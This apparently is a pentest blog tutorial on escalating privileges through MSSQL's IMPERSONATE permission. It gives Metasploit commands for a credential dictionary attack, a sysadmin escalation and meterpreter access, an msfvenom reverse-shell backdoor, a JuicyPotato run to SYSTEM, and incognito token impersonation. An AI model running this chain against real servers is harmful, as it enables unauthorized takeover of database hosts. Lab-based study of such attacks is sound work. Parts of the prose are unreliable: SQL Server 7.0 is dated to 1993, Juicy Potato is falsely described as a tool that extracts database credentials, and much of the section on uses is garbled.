In this article, we will learn about Impersonate feature that MSSQL servers offer. The earliest implementation of Impersonate was in SQL Server 7.0, released January 1993. This command is used to authenticate a user on behalf of another user. Let's learn all about it now.
Table of Content
·
Introduction
·
Uses
of Impersonate property
·
Security
Implications of MSSQL Impersonate
·
Introduction
to Juicy Potato
·
Enabling
Impersonate (GUI)
·
Exploiting
MSSQL via Impersonate
o
Metasploit
·
Escalate
Privilege
o
Metasploit
and Juicy Potato
o
Token
Impersonation
Introduction
The MSSQL Impersonate command is a way of
authenticating against other user names to execute system queries. It's
typically used in conjunction with the CREATE USER statement for this purpose.
When you use the impersonation account, SQL Server checks whether you have
permissions for all databases referenced by the query.
There are many cases in which it's necessary to
log in as someone else on a computer. For instance, you might not have the
administrative privileges required for tasks like installing new software or
accessing files that you can't access without credentials. However, there are
times when this is necessary even though you do have the appropriate level of
permissions. When this is the case, Microsoft provides an impersonation feature
called "Impersonate." It's one of those security features that's
built-in and easy to use. This article introduces how you can use it with
Microsoft SQL Server Management Studio (SSMS).
You need to understand several things before
you go; further, the first is that SQL Server has a login process that requires
authentication with a valid user name and password. When you log on as a user,
SSMS will prompt for that user's password. The next thing to understand is the
concept of impersonation—you can log in as one user but be logged on as
another. This means that if your current login isn't authorized for the task
you want to do, you can switch to a different account through impersonation and
still do the job.
Uses of Impersonate property
There are multiple uses of the Impersonate
property in the MSSQL server. Some of them are listed below:
·
Imagine
a client application needs to access a database on the server, but the client
doesn't run under a privileged account. In this case, MSSQL impersonation will
enable the client application to access the database without credentials for
accessing it on the server. This is useful when architecting Web or
file-sharing services where anonymous or unauthenticated users can upload data
for other users to download. The client application would access the database
without providing credentials by enabling impersonation with an anonymous user
account. The only credentials required would be for
creating/dropping/replicating tables.
·
This
property is applicable when you want a service account to access a database.
This means that all database connection strings not provided by the service
account require impersonating the server instance. With this property set, an
administrator would need to adjust all connection strings in one go and ensure
that they have been set accordingly with appropriate privileges on each server
application.
·
Another
reason for using this property is for compatibility with Active Directory Users
and Computers (ADUC). ADUC is a helpful tool for working with accounts and
groups in your domain: you can create/delete accounts, enable or disable
accounts, set password expirations, and generally manage user objects in your
Active Directory (AD) domain. However, ADUC does not allow you to add or update
custom data for user objects; instead, it will enable you to edit only the data
stored in standard fields such as first name, last name, etc. The impersonate
property forces MSSQL to present itself as a member of the Domain Users group
within the OS when connecting to the server. This means that users can use ADUC
without needing elevated permissions on their workstations.
·
This
property uses the same method as Windows for executing stored procedures (SPs)
and triggers on the remote server. This is what SQL Server does when impersonate:
it runs user=<user> as the context of TRUST on all remote SPs and
triggers. This allows T-SQL users to access the database using their Windows/AD
credentials without providing SQL Server credentials on every call.
·
It
can also invoke a database function or stored procedure that uses a specific
context user (for example, members of a database role). By setting this
property, you can allow users who are added to this group or database role to
start impersonating the server with just one connection.
Security Implications of MSSQL Impersonate
This property allows a user to impersonate
another user in MSSQL and create the other user's login credentials. The
security implications of using this property are that if someone can
impersonate you on your database, they can log into any application that
requires authentication against your database without needing to know any
passwords or personal information about you. This is precisely what we will try
and exploit in our article.
Introduction to Juicy Potato
We will exploit the Impersonate Property using
two tools: Metasploit and juicy potato. Everyone is familiar with Metasploit.
So, for now, I will take this opportunity to introduce Juicy Potato.
Juicy Potato Tool is used for hacking or
impersonating any SQL login with ease. The juicy potato will automatically
extract that user's username and password from that SQL server without any
problems. So, users can use it to hack their own or someone else's database
without any errors in this process. All the information will be saved on the
user's machine with the latest version.
Also, this tool can be used to extract
information from a specific table or columns. This is very useful for
pentesters to analyze a database and remove any essential things. It can also
be used to login into a database without knowing the login of the database. This
tool is one of its kind that is designed to extract all necessary information
from SQL Server, MySQL, MS Access, Oracle, and IBM DB2 with ease and speed. It
can create access files and scripts for the user's convenience. The user can
customize the output as per his requirements. So, it allows the user to do
anything that he wants to do with the database with a single click. This tool
has many features which make it robust and easy to use. It is beneficial for
network admins, administrators, pentesters, hackers, etc. It executes its
actions without any problem at all and in time. It is highly customizable,
which allows the user to customize everything about juicy potato as per their
needs. The user does not need any PC knowledge or programming knowledge to use
this tool perfectly and flawlessly.
Enabling Impersonate (GUI)
To know how to enable Impersonate property, let
us begin from starting by creating a new user. Go to server>Security>Logins.
Here, right-click on Logins and select the New Login option from the
drop-down menu that will appear after right-clicking, as shown in the image
below:
A dialogue box will open; in the dialogue box,
give the user login name and password. Make sure the check box for Enforce
password policy is unchecked, and then click the OK button as shown
in the image below:
And in the right panel, you will find that a
new user is created by the name of lowpriv. Now right click on the user. A
drop-down menu will appear. From this drop-down menu, click on the Properties
option as shown in the image below:
In the properties dialogue box, you can see
that the only property enable is public, as shown in the image below:
Now in the right panel, you can see that there
is an option called Securables. Click on that option and then click on the
Search button. Doing so will open a dialogue box. The dialogue box will
offer you three options. Choose Specific objects and click on the OK
button as shown in the image below:
Another dialogue box will open; in that
dialogue box, click on the Object Types button, which will open another
dialogue box. In this dialogue box, select the Login option and then
click on the OK button as shown in the image:
And then select the user whose login you want
to impersonate. In the image below, you can see that we have chosen sa user.
Once you have set the user, click on the OK button.
Now, if you check the permissions for sa user,
you will see that permission to impersonate the user is enabled as shown in the
image below:
Exploiting MSSQL via Impersonate
Metasploit
To exploit MSSQL via impersonate property, we
first have to find the username and password. We can deploy the following
exploit that will use the dictionary attack and help us find the credentials of
the user:
use auxiliary/scanner/mssql/mssql_login
set rhosts 192.168.1.146
set user_file /root/users.txt
set pass_file /root/pass.txt
set verbose false
exploit
As you can see in the image above, we have our
credentials. Now, we will check if we can run the mssql_payload exploit. The
purpose of doing so is that if this exploits successfully executes itself, that
will mean that the given user has the privilege to do so. Otherwise, we will
use another exploit to trigger the impersonate feature. To run the said
exploit, use the following set of commands:
use exploit/windows/mssql/mssql_payload
set rhosts 192.168.1.146
set username lowpriv
set password Password@1
exploit
As you can see in the image below, the exploit
does not run successfully. So now, we will use another exploit that will
trigger the enabling of impersonate property. And for that, use the following
exploit:
use
auxiliary/widows/mssql/mssql_escalate_execute_as
set rhosts 192.168.1.146
set username lowpriv
set password Password@1
exploit
As the result of the above exploit, you can see
that the user lowpriv is now the member of sysadmin as it impersonated the sa
user. You can even confirm from the properties that now the sa user will be a
sysadmin as well. The same has shown in the image below:
Now, if we run the previous exploit, which is
mssql_payload, then we will have our meterpreter session as shown in the image
below:
Now that we have the meterpreter session, we
can go to shell and see what privileges our user has with the help of
the command whoami. With the whoami /priv command, we can also
check if impersonate property is enabled or not; as shown in the image below:
Escalate Privilege
Meatsploit and Juicy Potato
Now, to gain authority\system access, we
will create a backdoor exe file using msfvenom. And for this type:
msfvenom -p windows/shell_reverse_tcp
lhost=192.168.1.12 lport=8888 -f exe > backdoor.exe
As you can see, the file is created. Now we
will do two things. First, we will upload the juicy Potato tool. And secondly, we
will upload our backdoor.exe. For this, go to the meterpreter session that we
had previously acquired. And type the following commands:
cd c:\\users\\public
upload /root/downloads/JuicyPotato.exe .
upload /root/Downloads/backdoor.exe .
Once both of the files are uploaded, go to
shell and run the following command:
JuicyPotato.exe -l 8888 -p backdoor.exe -t * -c {B91D5831-B1BD-4608-8198-D72E155020F7}
Once the above command is executed, you can
activate a netcat listener to receive a session, as shown in the image below:
Once you get your netcat session, you use the whoami
command to see that now you have access to authority\system, as you can see in
the image above.
Impersonate Token
Another method to access authority\system is by
impersonating the token. To do so, we will load the incognito extension in the
meterpreter session, and then we will invoke the lists of tokens. From there,
we choose the token and then impersonate to gain the desired access. And for
all this, use the following set of commands:
load incognito
list_tokens -u
impersonate_token "NT AUTHORITY\SYSTEM"
shell
whoami
And voila!!! We have the desired access. So
through these methods, you can pentest/exploit impersonate property of a user
in MSSQL.
0 comments:
Post a Comment